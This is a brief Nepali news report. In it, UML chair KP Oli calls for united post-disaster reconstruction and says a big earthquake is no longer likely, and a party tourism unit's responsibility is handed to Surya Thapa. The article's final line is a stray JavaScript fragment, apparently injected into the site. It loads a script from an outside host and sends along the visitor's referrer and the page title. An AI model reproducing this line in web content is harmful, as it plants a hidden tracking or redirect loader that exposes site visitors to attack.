नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले महाविपत्तिबाट शिक्षा लिँदै पुनःनिर्माणमा फरक ढंगबाट अघि बढ्नुपर्ने बताउनुभएको छ। सोमबार नेकपा एमाले निकट पर्यटन प्रवद्र्धन इकाइको कार्यक्रममा बोल्दै अध्यक्ष ओलीले सबै सम्हालीएर पुनः निर्माणमा एक जुट हुनेबेला आएको बताउनुभएको हो। उहाले अब ठुलो भाुईंचालो आउने सम्भावना नरहेको भन्दै सानातीना कम्पनबाट वीर नेपाली डराउन नहुने उल्लेख गर्नुभयो। उहाले सबै दलहरु एक भएर महाविपत्तिको सामना गर्ने तयारी भैरहेको र आम जनताको पीडामा मल्हम लगाउने काम हुने बताउनुभयो।
कार्यक्रममा एमाले स्थायी समिति सदस्य मुकुन्द न्यौपानेले नवौँ महाधिवेशनबाट पर्यटन विभागको जिम्मेवारी पाएका एमाले केन्द्रीय सदस्य सूर्य थापालाई जिम्मेवारी हस्तान्तरण गर्नुभएको थियो। जिम्मेवारी ग्रहण गर्दै केन्द्रीय सदस्य थापाले पूर्वाधार क्षेत्रमा आगामी बजेटमा ५ प्रतिशत बजेट छुट्याउनुपर्ने बताउनुभयो।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;